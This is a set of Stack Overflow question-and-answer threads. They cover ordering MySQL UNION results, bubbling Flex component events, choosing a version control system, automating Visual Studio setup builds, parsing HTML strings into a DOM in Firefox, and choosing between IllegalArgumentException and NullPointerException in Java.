SELECT A,B,C,3 as `order` FROM table WHERE field LIKE '%query%'
GROUP BY B ORDER BY `order` ASC, B ASC LIMIT 5
A: Can you do it as a subselect, something like
SELECT * FROM (
SELECT A,B,C FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C FROM table WHERE field LIKE '%query%'
) AS combined ORDER BY B ASC LIMIT 5
A: Maybe you should try including a fourth column stating which query it came from, and then order and group by it:
SELECT A,B,C, "query 1" as origin FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C, "query 2" as origin FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C, "query 3" as origin FROM table WHERE field LIKE '%query%'
GROUP BY origin, B ORDER BY origin, B ASC LIMIT 5
A: SELECT distinct a,b,c FROM (
SELECT A,B,C,1 as o FROM table WHERE field LIKE 'query%'
UNION
SELECT A,B,C,2 as o FROM table WHERE field LIKE '%query'
UNION
SELECT A,B,C,3 as o FROM table WHERE field LIKE '%query%'
) AS t
ORDER BY o ASC LIMIT 5
Would be my way of doing it. I don't know how that scales.
I don't understand the
GROUP BY B ORDER BY B ASC LIMIT 5
Does it apply only to the last SELECT in the union?
Does mysql actually allow you to group by a column and still not do aggregates on the other columns?
EDIT: aaahh. I see that MySQL actually does. It's a special version of DISTINCT(b) or something. I wouldn't want to try to be an expert on that area :)
A: If there isn't a sort that makes sense to order them the way you desire, don't union the results together - just return 3 separate recordsets, and deal with them accordingly in your data tier.
A: I eventually (looking at all suggestions) came to this solution; it's a bit of a compromise between what I need and time.
SELECT * FROM
(SELECT A, B, C, "1" FROM table WHERE B LIKE 'query%' LIMIT 3
UNION
SELECT A, B, C, "2" FROM table WHERE B LIKE '%query%' LIMIT 5)
AS RS
GROUP BY B
ORDER BY 1 DESC
it delivers 5 results total, sorts from the fourth "column" and gives me what I need; a natural result set (it's coming over AJAX), and a wildcard result set following right after.
:)
/mp
A: There are two variants of UNION.
'UNION' and 'UNION ALL'
In most cases what you really want is UNION ALL, as it does not do duplicate elimination (think SELECT DISTINCT) between sets, which can result in quite a bit of savings in terms of execution time.
Others have suggested multiple result sets which is a workable solution however I would caution against this in time sensitive applications or applications connected over WANs as doing so can result in significantly more round trips on the wire between server and client.
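Applied to the original query, UNION ALL combined with the extra ordering column from the other answers might look like this (a sketch; it leans on MySQL's loose GROUP BY semantics discussed above, and remember UNION ALL keeps duplicates):
SELECT A, B, C FROM (
    SELECT A, B, C, 1 AS priority FROM table WHERE field LIKE 'query%'
    UNION ALL
    SELECT A, B, C, 2 AS priority FROM table WHERE field LIKE '%query'
    UNION ALL
    SELECT A, B, C, 3 AS priority FROM table WHERE field LIKE '%query%'
) AS ranked
GROUP BY B
ORDER BY priority ASC, B ASC
LIMIT 5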
A: I don't understand why you need a union to take the data from a single table
SELECT A, B, C
FROM table
WHERE field LIKE 'query%'
OR field LIKE '%query'
OR field LIKE '%query%'
GROUP BY B
ORDER BY B ASC LIMIT 5
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3839",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Adobe Flex component events I wrote a component that displays a filename, a thumbnail and has a button to load/play the file. The component is databound to a repeater. How can I make it so that the button event fires to the main application and tells it which file to play?
A: Figured it out (finally)
Custom Component
<?xml version="1.0" encoding="utf-8"?>
<mx:Canvas xmlns:mx="http://www.adobe.com/2006/mxml" x="0" y="0" width="215" height="102" styleName="leftListItemPanel" backgroundColor="#ECECEC" horizontalScrollPolicy="off" verticalScrollPolicy="off">
<mx:Script>
<![CDATA[
[Bindable] public var Title:String = "";
[Bindable] public var Description:String = "";
[Bindable] public var Icon:String = "";
[Bindable] public var FileID:String = "";
private function viewClickHandler():void{
dispatchEvent(new Event("viewClick", true));// bubble to parent
}
]]>
</mx:Script>
<mx:Metadata>
[Event(name="viewClick", type="flash.events.Event")]
</mx:Metadata>
<mx:Label x="11" y="9" text="{String(Title)}" styleName="listItemLabel"/>
<mx:TextArea x="11" y="25" height="36" width="170" backgroundAlpha="0.0" alpha="0.0" styleName="listItemDesc" wordWrap="true" editable="false" text="{String(Description)}"/>
<mx:Button x="20" y="65" label="View" click="viewClickHandler();" styleName="listItemButton" height="22" width="60"/>
<mx:LinkButton x="106" y="68" label="Details..." styleName="listItemLink" height="18"/>
<mx:HRule x="0" y="101" width="215"/>
</mx:Canvas>
The Repeater
<mx:Canvas id="pnlSpotlight" label="SPOTLIGHT" height="100%" width="100%" horizontalScrollPolicy="off">
<mx:VBox width="100%" height="80%" paddingTop="2" paddingBottom="1" verticalGap="1">
<mx:Repeater id="rptrSpotlight" dataProvider="{aSpotlight}">
<sm:SmallCourseListItem
viewClick="PlayFile(event.currentTarget.getRepeaterItem().fileName);"
Description="{rptrSpotlight.currentItem.fileDescription}"
FileID = "{rptrSpotlight.currentItem.fileName}"
Title="{rptrSpotlight.currentItem.fileTitle}" />
</mx:Repeater>
</mx:VBox>
</mx:Canvas>
Handling function
private function PlayFile(fileName:String):void{
Alert.show(fileName.toString());
}
A: On your custom component you can listen to the button click event and then generate a custom event that holds information about the file you want to play. You can then set the bubbles property to true on the event and dispatch the custom event from your custom component. The bubbles property will make your event float up the display list and reach your main application. Now on your main application you can listen to that event and play the correct file. Hope this helps.
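To make the event carry the file name itself (rather than digging it out via getRepeaterItem), a custom event class is a sketch along these lines (PlayFileEvent is a hypothetical name):
// ActionScript 3: a bubbling event that carries the file to play
public class PlayFileEvent extends Event
{
    public static const PLAY_FILE:String = "playFile";
    public var fileName:String;

    public function PlayFileEvent(fileName:String)
    {
        super(PLAY_FILE, true); // bubbles = true so it reaches the application
        this.fileName = fileName;
    }

    // events that bubble should be cloneable
    override public function clone():Event
    {
        return new PlayFileEvent(fileName);
    }
}
You would then dispatch it from the component with dispatchEvent(new PlayFileEvent(FileID)) instead of a plain Event.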
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3856",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: What is the difference between all the different types of version control? After being told by at least 10 people on SO that version control was a good thing even if it's just me I now have a followup question.
What is the difference between all the different types of version control and is there a guide that anybody knows of for version control that's very simple and easy to understand?
A: To everyone just starting using version control:
Please do not use git (or hg or bzr) because of the hype
Use git (or hg or bzr) because they are better tools for managing source code than SVN.
I used SVN for a few years at work, and switched over to git 6 months ago. Without learning SVN first I would be totally lost when it comes to using a DVCS.
For people just starting out with version control:
*
*Start by downloading SVN
*Learn why you need version control
*Learn how to commit, checkout, branch
*Learn why merging in SVN is such a pain
Then switch over to a DVCS and learn:
*
*How to clone/branch/commit
*How easy it is to merge your branches back (go branch crazy!)
*How easy it is to rewrite commit history and keep your branches up to date with the main line (git rebase -i)
*How to publish your changes so others can benefit
tldr; crowd:
Start with SVN and learn the basics, then graduate to a DVCS.
A: Version Control is essential to development, even if you're working by yourself because it protects you from yourself. If you make a mistake, it's a simple matter to rollback to a previous version of your code that you know works. This also frees you to explore and experiment with your code because you're free of having to worry about whether what you're doing is reversible or not. There are two major branches of Version Control Systems (VCS), Centralized and Distributed.
Centralized VCS are based on using a central server, where everyone "checks out" a project, works on it, and "commits" their changes back to the server for anybody else to use. The major Centralized VCS are CVS and SVN. Both have been heavily criticized because "merging" "branches" is extremely painful with them. [TODO: write explanation on what branches are and why merging is hard with CVS & SVN]
Distributed VCS let everyone have their own server, where you can "pull" changes from other people and "push" changes to a server. The most common Distributed VCS are Git and Mercurial. [TODO: write more on Distributed VCS]
If you're working on a project I heavily recommend using a distributed VCS. I recommend Git because it's blazingly fast, but it has been criticized as being too hard to use. If you don't mind using a commercial product, BitKeeper is supposedly easy to use.
A: I would start with:
*
*A Visual Guide to Version Control
*Wikipedia
Then once you have read up on it, download and install SVN, TortoiseSVN and skim the first few chapters of the book and get started.
A: The answer to another question also applies here, most importantly
Jon Works said:
The most important thing about version control is:
JUST START USING IT
His answer goes into more detail, and I don't want to be accused of plagiarism, so take a look.
A: We seem to be in the golden age of version control, with a ton of choices, all of which have their pros and cons.
Here are the ones I see most used:
*
*svn - currently the most popular open source?
*git - very hot since Linus switched to it
*mercurial - some smart people I know swear by it
*cvs - the one everybody is switching from
*perforce - imho, the best features, but it's not open source. The two-user license is free, though.
*visual sourcesafe - I'm not much in the Microsoft world, so I have no idea about this one, other than people like to rag on it as they rag on everything from Microsoft.
*sccs - for historical interest we mention this, the great-grandaddy of many of the above
*rcs - and the grandaddy of many of the above
My recommendation: you're safest with either git, svn or perforce, since a lot of people use them, they are cross platform, have good guis, you can buy books about them, etc.
Don't consider cvs, sccs, or rcs; they are antique.
The nice thing is that, since your projects will be relatively small, you will be able to move your code to a new system once you're more experienced and decide you want to work with another system.
A: The simple answer is, do you like Undo buttons? The answer is of course yes, because we as human beings make mistakes all the time.
As programmers, it's often the case that it can take several hours of testing, code changes, overwrites, deletions, file moves and renames before we work out that the method we are trying to use to fix a problem is entirely the wrong one and the code is more broken than when we started.
As such, Source Control is a massive Undo button to revert the code to an earlier time when the grass was green and the food plentiful. And not only that, because of how source control works, you can still keep a copy of your broken code, in case a few weeks down the line you want to refer to it again and cherry pick any good ideas that did come out of it.
I personally (though it could be called overkill) use a free single-user license version of SourceGear Fortress (which is their Vault source control product with bug tracking features). I find the UI really simple to use; it supports both the checkout > edit > checkin model and the edit > merge > commit model. It can be a little tricky to set up though, requiring you to run a local copy of IIS and SQL Server. You might want to try a smaller program, like those recommended by other answers here. See what you like and what you can afford.
A: Mark said:
git - very hot since Linus switched to it
I just want to point out that Linus didn't switch to it, Linus wrote it.
A: Eric Sink has a good overview of source control. There are also some existing questions here on SO.
A: If you are working by yourself in a Windows environment, then the single user license for SourceGear's Vault is free.
A: We use and like Mercurial. It follows a distributed model - it eliminates some of the sense of having to "check in" work. Mozilla has moved to Mercurial, which is a good sign that it's not going to go away any time soon. One con, in my opinion, is that there isn't a very good GUI for it. If you're comfortable with the command line, though, it's pretty handy.
Mercurial Documentation
Unofficial Manual
A: Just start using source control, no matter what type you use. What you use doesn't matter; it's the use of it that is important
A: Like everyone else, SC is really dependant on your needs, your budget, your environment, etc.
At its root, source control is designed to provide a central repository of all your code, and track who did what to it when. There should be a complete history, and you can get products that do full changelogs, auditing, access control, and on and on...
Each product that is out there starts to shine (so to speak) when you start to look at how you want or need to incorporate SC into your environment (whether it's your personal code and documents or a large corporations). And as people use them, they discover that the tool has limitations, so people write new ones. SVN was born out of limitations that the creators saw with CVS. Linus wanted something better for the Linux kernel, so now we have git.
I would say start using one (something like SVN which is very popular and pretty easy to use) and see how it goes. As time progresses you may find that you need some other functionality, or need to interface with other systems, so you may need SourceSafe or another tool.
Source control is always important, and while you can get away with manually re-numbering versions of PSD files or something as you work on them, you're going to forget to run that batch script once or twice, or likely forget which number went with which change. That's where most of these SC tools can help (as long as you check-in/check-out).
A: See also this SO question:
*
*Difference between GIT and CVS
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3859",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Automated release script and Visual Studio Setup projects I think most people here understand the importance of fully automated builds.
The problem is one of our projects now uses an integrated Visual Studio Setup project (vdproj) and has recently been ported to Visual Studio 2008. Unfortunately, those won't build in MSBuild, and calling devenv.exe /build on 2008 just crashes; apparently it does that on all multi-core computers (!!!). So now I have the choice to either roll back to .NET 2.0 and 2005 or simply ditch Visual Studio deployment, but first, I'd like a second opinion.
Anyone knows of another automated way to build a .vdproj that will not require us to open the IDE and click on stuff?
WiX was what I had in mind when saying we would ditch vdproj. Do you have any experience with it, good things, caveat?
A: The low cost solution is to switch to using ClickOnce, which you can automate using MSBuild. But if you still need to create a Windows Installer package, you will need to convert your project to WiX (pretty straight foward) and build that with your solution.
This will get you started:
Automate Releases With MSBuild And Windows Installer XML
A: I've used WiX a little bit before, and generally I found that it's great once you figure out what to do, but there is a steep learning curve. If you spend a solid day going over the WiX tutorial you should be able to get 80% of your setup working.
WiX Toolset Tutorial
A: I had the same requirement and ended up using what is suggested in these two links
David Williams Blog
MSDN article
Basically, since Team Build, by itself, will not build the setup projects for you, this approach has you add a new build step after the regular build is complete. This step fires off a second build by launching devenv.exe. The IDE will build your setup files. The extra build is a bit costly, but we only needed it for builds that were going to be pushed out. The daily build at most would need this customization; our CI build does not need to build setup files each time.
After that you execute some Copy commands, once again build steps that show up in your Team System build results, to move the setup files to a network share etc.
It feels a bit like a kluge at first, but it does work, it is also a full-fledged part of the automated build in Team System so it worked for my Continuous Integration goals.
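For reference, the second build step usually boils down to a command line along these lines (solution, project, and share names here are hypothetical):
devenv.com MySolution.sln /Build "Release" /Project "Setup\Setup.vdproj" /ProjectConfig "Release"
xcopy "Setup\Release\*.msi" "\\buildserver\drops\MyProduct\" /Y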
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3867",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How can I turn a string of HTML into a DOM object in a Firefox extension? I'm downloading a web page (tag soup HTML) with XMLHttpRequest and I want to take the output and turn it into a DOM object that I can then run XPATH queries on. How do I convert from a string into DOM object?
It appears that the general solution is to create a hidden iframe and throw the contents of the string into that. There has been talk of updating DOMParser to support text/html but as of Firefox 3.0.1 you still get an NS_ERROR_NOT_IMPLEMENTED if you try.
Is there any option besides using the hidden iframe trick? And if not, what is the best way to do the iframe trick so that your code works outside the context of any currently open tabs (so that closing tabs won't screw up the code, etc)?
This is an example of why I'm looking for a solution other than the iframe hack: if I have to write all that code to have a robust solution, then I'd rather keep looking for something else.
A: Try this:
var request = new XMLHttpRequest();
request.overrideMimeType( 'text/xml' );
request.onreadystatechange = process;
request.open ( 'GET', url );
request.send( null );
function process() {
if ( request.readyState == 4 && request.status == 200 ) {
var xml = request.responseXML;
}
}
Notice the overrideMimeType and responseXML. The readyState == 4 is 'completed'.
A: Try creating a div
document.createElement( 'div' );
And then set the tag soup HTML to the innerHTML of the div. The browser should process that into a DOM tree, which you can then parse.
The innerHTML property takes a string
that specifies a valid combination of
text and elements. When the innerHTML
property is set, the given string
completely replaces the existing
content of the object. If the string
contains HTML tags, the string is
parsed and formatted as it is placed
into the document.
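A sketch of that approach, where htmlString is the tag soup you downloaded:
var container = document.createElement('div');
container.innerHTML = htmlString; // the browser parses the tag soup for you
// walk it with ordinary DOM calls...
var links = container.getElementsByTagName('a');
// ...or run XPath against it (works in Firefox)
var result = document.evaluate('.//a[@href]', container, null,
    XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);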
A: Ajaxian actually had a post on inserting / retrieving html from an iframe today. You can probably use the js snippet they have posted there.
As for handling closing of a browser / tab, you can attach to the onbeforeunload (http://msdn.microsoft.com/en-us/library/ms536907(VS.85).aspx) event and do whatever you need to do.
A: So you want to download a webpage as an XML object using JavaScript, but you don't want to use a webpage? Since you have no control over what the user will do (closing tabs or windows or whatnot), you would need to do this in something like an OS X Dashboard widget or some separate application. A Firefox extension would also work, unless you have to worry about the user closing the browser.
A:
Is there any option besides using the hidden iframe trick?
Unfortunately, no, not now. Otherwise the microsummary code you point to would use it instead.
And if not, what is the best way to do the iframe trick so that your code works outside the context of any currently open tabs (so that closing tabs won't screw up code, etc)?
The code you quoted uses the most recent browser window, so closing tabs won't affect parsing. Closing that browser window will abort your load, but you can deal with it (detect that the load is aborted and restart it in another window, for example) and it doesn't happen very often.
You need a DOM window for the iframe to work properly, so there's no clean solution at the moment (if you're keen on using the mozilla parser).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3868",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: IllegalArgumentException or NullPointerException for a null parameter? I have a simple setter method for a property and null is not appropriate for this particular property. I have always been torn in this situation: should I throw an IllegalArgumentException, or a NullPointerException? From the javadocs, both seem appropriate. Is there some kind of an understood standard? Or is this just one of those things that you should do whatever you prefer and both are really correct?
A: As a subjective question this should be closed, but as it's still open:
This is part of the internal policy used at my previous place of employment and it worked really well. This is all from memory so I can't remember the exact wording. It's worth noting that they did not use checked exceptions, but that is beyond the scope of the question. The unchecked exceptions they did use fell into 3 main categories.
NullPointerException: Do not throw intentionally. NPEs are to be thrown only by the VM when dereferencing a null reference. All possible effort is to be made to ensure that these are never thrown. @Nullable and @NotNull should be used in conjunction with code analysis tools to find these errors.
IllegalArgumentException: Thrown when an argument to a function does not conform to the public documentation, such that the error can be identified and described in terms of the arguments passed in. The OP's situation would fall into this category.
IllegalStateException: Thrown when a function is called and its arguments are either unexpected at the time they are passed or incompatible with the state of the object the method is a member of.
For example, there were two internal versions of the IndexOutOfBoundsException used in things that had a length. One a sub-class of IllegalStateException, used if the index was larger than the length. The other a subclass of IllegalArgumentException, used if the index was negative. This was because you could add more items to the object and the argument would be valid, while a negative number is never valid.
As I said, this system works really well, and it took someone to explain why the distinction is there: "Depending on the type of error it is quite straightforward for you to figure out what to do. Even if you can't actually figure out what went wrong you can figure out where to catch that error and create additional debugging information."
NullPointerException: Handle the null case or put in an assertion so that the NPE is not thrown. If you put in an assertion, it becomes just one of the other two types. If possible, continue debugging as if the assertion was there in the first place.
IllegalArgumentException: you have something wrong at your call site. If the values being passed in are from another function, find out why you are receiving an incorrect value. If you are passing in one of your arguments propagate the error checks up the call stack until you find the function that is not returning what you expect.
IllegalStateException: You have not called your functions in the correct order. If you are using one of your arguments, check them and throw an IllegalArgumentException describing the issue. You can then propagate the checks up the call stack until you find the issue.
Anyway, his point was that you can only propagate the IllegalArgumentException checks up the stack. There is no way for you to propagate the IllegalStateExceptions or NullPointerExceptions up the stack because they had something to do with your function.
A: I tend to follow the design of JDK libraries, especially Collections and Concurrency (Joshua Bloch, Doug Lea, those guys know how to design solid APIs). Anyway, many APIs in the JDK pro-actively throws NullPointerException.
For example, the Javadoc for Map.containsKey states:
@throws NullPointerException if the key is null and this map
does not permit null keys (optional).
It's perfectly valid to throw your own NPE. The convention is to include the parameter name which was null in the message of the exception.
The pattern goes:
public void someMethod(Object mustNotBeNull) {
if (mustNotBeNull == null) {
throw new NullPointerException("mustNotBeNull must not be null");
}
}
Whatever you do, don't allow a bad value to get set and throw an exception later when other code attempts to use it. That makes debugging a nightmare. You should always follow the "fail-fast" principle.
A: Couldn't agree more with what's being said. Fail early, fail fast. Pretty good Exception mantra.
The question about which Exception to throw is mostly a matter of personal taste. In my mind IllegalArgumentException seems more specific than using a NPE since it's telling me that the problem was with an argument I passed to the method and not with a value that may have been generated while performing the method.
My 2 Cents
A: Actually, the question of throwing IllegalArgumentException or NullPointerException is in my humble view only a "holy war" for a minority with an incomplete understanding of exception handling in Java. In general, the rules are simple, and as follows:
*
*argument constraint violations must be indicated as fast as possible (-> fast fail), in order to avoid illegal states which are much harder to debug
*in case of an invalid null pointer for whatever reason, throw NullPointerException
*in case of an illegal array/collection index, throw ArrayIndexOutOfBounds
*in case of a negative array/collection size, throw NegativeArraySizeException
*in case of an illegal argument that is not covered by the above, and for which you don't have another more specific exception type, throw IllegalArgumentException as a wastebasket
*on the other hand, in case of a constraint violation WITHIN A FIELD that could not be avoided by fast fail for some valid reason, catch and rethrow as IllegalStateException or a more specific checked exception. Never let pass the original NullPointerException, ArrayIndexOutOfBounds, etc in this case!
There are at least three very good reasons against the case of mapping all kinds of argument constraint violations to IllegalArgumentException, with the third probably being so severe as to mark the practice bad style:
(1) A programmer cannot safely assume that all cases of argument constraint violations result in IllegalArgumentException, because the large majority of standard classes use this exception rather as a wastebasket if there is no more specific kind of exception available. Trying to map all cases of argument constraint violations to IllegalArgumentException in your API only leads to programmer frustration using your classes, as the standard libraries mostly follow different rules that violate yours, and most of your API users will use them as well!
(2) Mapping the exceptions actually results in a different kind of anomaly, caused by single inheritance: All Java exceptions are classes, and therefore support single inheritance only. Therefore, there is no way to create an exception that is truly both a NullPointerException and an IllegalArgumentException, as subclasses can only inherit from one or the other. Throwing an IllegalArgumentException in case of a null argument therefore makes it harder for API users to distinguish between problems whenever a program tries to programmatically correct the problem, for example by feeding default values into a call repeat!
(3) Mapping actually creates the danger of bug masking: In order to map argument constraint violations into IllegalArgumentException, you'll need to code an outer try-catch within every method that has any constrained arguments. However, simply catching RuntimeException in this catch block is out of the question, because that risks mapping documented RuntimeExceptions thrown by library methods used within yours into IllegalArgumentException, even if they are not caused by argument constraint violations. So you need to be very specific, but even that effort doesn't protect you from the case that you accidentally map an undocumented runtime exception of another API (i.e. a bug) into an IllegalArgumentException of your API. Even the most careful mapping therefore risks masking programming errors of other library makers as argument constraint violations of your method's users, which is simply hilarious behavior!
With the standard practice on the other hand, the rules stay simple, and exception causes stay unmasked and specific. For the method caller, the rules are easy as well:
- if you encounter a documented runtime exception of any kind because you passed an illegal value, either repeat the call with a default (for this, specific exceptions are necessary), or correct your code
- if on the other hand you encounter a runtime exception that is not documented to happen for a given set of arguments, file a bug report to the method's makers to ensure that either their code or their documentation is fixed.
A: The accepted practice is to use the IllegalArgumentException( String message ) to declare a parameter to be invalid and give as much detail as possible... So, to say that a parameter was found to be null when a non-null value was expected, you would do something like this:
if( variable == null )
throw new IllegalArgumentException("The object 'variable' cannot be null");
You have virtually no reason to explicitly throw a "NullPointerException" yourself. The NullPointerException is an exception thrown by the Java Virtual Machine when you try to execute code on a null reference (like toString()).
A: Throwing an exception that's exclusive to null arguments (whether NullPointerException or a custom type) makes automated null testing more reliable. This automated testing can be done with reflection and a set of default values, as in Guava's NullPointerTester. For example, NullPointerTester would attempt to call the following method...
Foo(String string, List<?> list) {
checkArgument(string.length() > 0);
// missing null check for list!
this.string = string;
this.list = list;
}
...with two lists of arguments: "", null and null, ImmutableList.of(). It would test that each of these calls throws the expected NullPointerException. For this implementation, passing a null list does not produce NullPointerException. It does, however, happen to produce an IllegalArgumentException because NullPointerTester happens to use a default string of "". If NullPointerTester expects only NullPointerException for null values, it catches the bug. If it expects IllegalArgumentException, it misses it.
A: In general, a developer should never throw a NullPointerException. This exception is thrown by the runtime when code attempts to dereference a variable who's value is null. Therefore, if your method wants to explicitly disallow null, as opposed to just happening to have a null value raise a NullPointerException, you should throw an IllegalArgumentException.
A: Some collections assume that null is rejected using NullPointerException rather than IllegalArgumentException. For example, if you compare a set containing null to a set that rejects null, the first set will call containsAll on the other and catch its NullPointerException -- but not IllegalArgumentException. (I'm looking at the implementation of AbstractSet.equals.)
You could reasonably argue that using unchecked exceptions in this way is an antipattern, that comparing collections that contain null to collections that can't contain null is a likely bug that really should produce an exception, or that putting null in a collection at all is a bad idea. Nevertheless, unless you're willing to say that equals should throw an exception in such a case, you're stuck remembering that NullPointerException is required in certain circumstances but not in others. ("IAE before NPE except after 'c'...")
Somewhat similarly, build tools may insert null checks automatically. Notably, Kotlin's compiler does this when passing a possibly null value to a Java API. And when a check fails, the result is a NullPointerException. So, to give consistent behavior to any Kotlin users and Java users that you have, you'd need to use NullPointerException.
A: Voted up Jason Cohen's argument because it was well presented. Let me dismember it step by step. ;-)
*
*The NPE JavaDoc explicitly says, "other illegal uses of the null object". If it was just limited to situations where the runtime encounters a null when it shouldn't, all such cases could be defined far more succinctly.
*Can't help it if you assume the wrong thing, but assuming encapsulation is applied properly, you really shouldn't care or notice whether a null was dereferenced inappropriately vs. whether a method detected an inappropriate null and fired an exception off.
*I'd choose NPE over IAE for multiple reasons
*
*It is more specific about the nature of the illegal operation
*Logic that mistakenly allows nulls tends to be very different from logic that mistakenly allows illegal values. For example, if I'm validating data entered by a user, if I get value that is unacceptable, the source of that error is with the end user of the application. If I get a null, that's programmer error.
*Invalid values can cause things like stack overflows, out of memory errors, parsing exceptions, etc. Indeed, most errors generally present, at some point, as an invalid value in some method call. For this reason I see IAE as actually the MOST GENERAL of all exceptions under RuntimeException.
*Actually, other invalid arguments can result in all kinds of other exceptions. UnknownHostException, FileNotFoundException, a variety of syntax error exceptions, IndexOutOfBoundsException, authentication failures, etc., etc.
In general, I feel NPE is much maligned because it has traditionally been associated with code that fails to follow the fail-fast principle. That, plus the JDK's failure to populate NPEs with a message string, has really created a strong negative sentiment that isn't well founded. Indeed, the difference between NPE and IAE from a runtime perspective is strictly the name. From that perspective, the more precise you are with the name, the more clarity you give to the caller.
A: You should be using IllegalArgumentException (IAE), not NullPointerException (NPE) for the following reasons:
First, the NPE JavaDoc explicitly lists the cases where NPE is appropriate. Notice that all of them are thrown by the runtime when null is used inappropriately. In contrast, the IAE JavaDoc couldn't be more clear: "Thrown to indicate that a method has been passed an illegal or inappropriate argument." Yup, that's you!
Second, when you see an NPE in a stack trace, what do you assume? Probably that someone dereferenced a null. When you see IAE, you assume the caller of the method at the top of the stack passed in an illegal value. Again, the latter assumption is true, the former is misleading.
Third, since IAE is clearly designed for validating parameters, you have to assume it as the default choice of exception, so why would you choose NPE instead? Certainly not for different behavior -- do you really expect calling code to catch NPE's separately from IAE and do something different as a result? Are you trying to communicate a more specific error message? But you can do that in the exception message text anyway, as you should for all other incorrect parameters.
Fourth, all other incorrect parameter data will be IAE, so why not be consistent? Why is it that an illegal null is so special that it deserves a separate exception from all other types of illegal arguments?
Finally, I accept the argument given by other answers that parts of the Java API use NPE in this manner. However, the Java API is inconsistent with everything from exception types to naming conventions, so I think just blindly copying (your favorite part of) the Java API isn't a good enough argument to trump these other considerations.
A: I wanted to single out null arguments from other illegal arguments, so I derived an exception from IAE named NullArgumentException. Without even needing to read the exception message, I know that a null argument was passed into a method, and by reading the message, I find out which argument was null. I still catch the NullArgumentException with an IAE handler, but in my logs I can see the difference quickly.
A: The dichotomy... Are they non-overlapping? Only non-overlapping parts of a whole can make a dichotomy. As I see it:
throw new IllegalArgumentException(new NullPointerException(NULL_ARGUMENT_IN_METHOD_BAD_BOY_BAD));
A: According to your scenario, IllegalArgumentException is the best pick, because null is not a valid value for your property.
A: NullPointerException is thrown when attempting to access an object through a reference variable whose current value is null.
IllegalArgumentException is thrown when a method receives an argument formatted differently than the method expects.
A: It seems like an IllegalArgumentException is called for if you don't want null to be an allowed value, and the NullPointerException would be thrown if you were trying to use a variable that turns out to be null.
A: It's a "Holy War" style question. In others words, both alternatives are good, but people will have their preferences which they will defend to the death.
A: If it's a setter method and null is being passed to it, I think it would make more sense to throw an IllegalArgumentException. A NullPointerException seems to make more sense in the case where you're attempting to actually use the null.
So, if you're using it and it's null, NullPointer. If it's being passed in and it's null, IllegalArgument.
A: The standard is to throw the NullPointerException. The generally infallible "Effective Java" discusses this briefly in Item 42 (first edition), Item 60 (second edition), or Item 72 (third edition) "Favor the use of standard exceptions":
"Arguably, all erroneous method
invocations boil down to an illegal
argument or illegal state, but other
exceptions are standardly used for
certain kinds of illegal arguments and
states. If a caller passes null in
some parameter for which null values
are prohibited, convention dictates
that NullPointerException be thrown
rather than IllegalArgumentException."
A: I was all in favour of throwing IllegalArgumentException for null parameters, until today, when I noticed the java.util.Objects.requireNonNull method in Java 7. With that method, instead of doing:
if (param == null) {
throw new IllegalArgumentException("param cannot be null.");
}
you can do:
Objects.requireNonNull(param);
and it will throw a NullPointerException if the parameter you pass it is null.
Given that that method is right bang in the middle of java.util I take its existence to be a pretty strong indication that throwing NullPointerException is "the Java way of doing things".
I think I'm decided at any rate.
Note that the arguments about hard debugging are bogus because you can of course provide a message to NullPointerException saying what was null and why it shouldn't be null. Just like with IllegalArgumentException.
One added advantage of NullPointerException is that, in highly performance critical code, you could dispense with an explicit check for null (and a NullPointerException with a friendly error message), and just rely on the NullPointerException you'll get automatically when you call a method on the null parameter. Provided you call a method quickly (i.e. fail fast), then you have essentially the same effect, just not quite as user friendly for the developer. Most times it's probably better to check explicitly and throw with a useful message to indicate which parameter was null, but it's nice to have the option of changing that if performance dictates without breaking the published contract of the method/constructor.
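For completeness, there is an overload of requireNonNull that takes a message, and since it returns its argument, the check-and-assign idiom becomes a one-liner:
this.param = Objects.requireNonNull(param, "param must not be null");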
A: Apache Commons Lang has a NullArgumentException that does a number of the things discussed here: it extends IllegalArgumentException and its sole constructor takes the name of the argument which should have been non-null.
While I feel that throwing something like a NullArgumentException or IllegalArgumentException more accurately describes the exceptional circumstances, my colleagues and I have chosen to defer to Bloch's advice on the subject.
A: If you choose to throw a NPE and you are using the argument in your method, it might be redundant and expensive to explicitly check for a null. I think the VM already does that for you.
A: The definitions from the links to the two exceptions above are
IllegalArgumentException: Thrown to indicate that a method has been passed an illegal or inappropriate argument.
NullPointerException: Thrown when an application attempts to use null in a case where an object is required.
The big difference here is that IllegalArgumentException is supposed to be used when checking that an argument to a method is valid, whereas NullPointerException is supposed to be used whenever an object being "used" is null.
I hope that helps put the two in perspective.
A: If it's a "setter", or somewhere I'm getting a member to use later, I tend to use IllegalArgumentException.
If it's something I'm going to use (dereference) right now in the method, I throw a NullPointerException proactively. I like this better than letting the runtime do it, because I can provide a helpful message (seems like the runtime could do this too, but that's a rant for another day).
If I'm overriding a method, I use whatever the overridden method uses.
A: You should throw an IllegalArgumentException, as it will make it obvious to the programmer that he has done something invalid. Developers are so used to seeing NPE thrown by the VM that a programmer might not immediately realize his error, and would start looking around randomly, or worse, blame your code for being 'buggy'.
A: In this case, IllegalArgumentException conveys clear information to the user of your API that the argument "should not be null". As other forum users pointed out, you could use NPE if you want to, as long as you convey the right information to the user of your API.
GaryF and tweakt dropped "Effective Java" (which I swear by) references which recommends using NPE. And looking at how other good APIs are constructed is the best way to see how to construct your API.
Another good example is to look at the Spring APIs. For example, org.springframework.beans.BeanUtils.instantiateClass(Constructor ctor, Object[] args) has an Assert.notNull(ctor, "Constructor must not be null") line. The org.springframework.util.Assert.notNull(Object object, String message) method checks whether the argument (object) passed in is null, and if it is, throws a new IllegalArgumentException(message), which then surfaces from the org.springframework.beans.BeanUtils.instantiateClass(...) method.
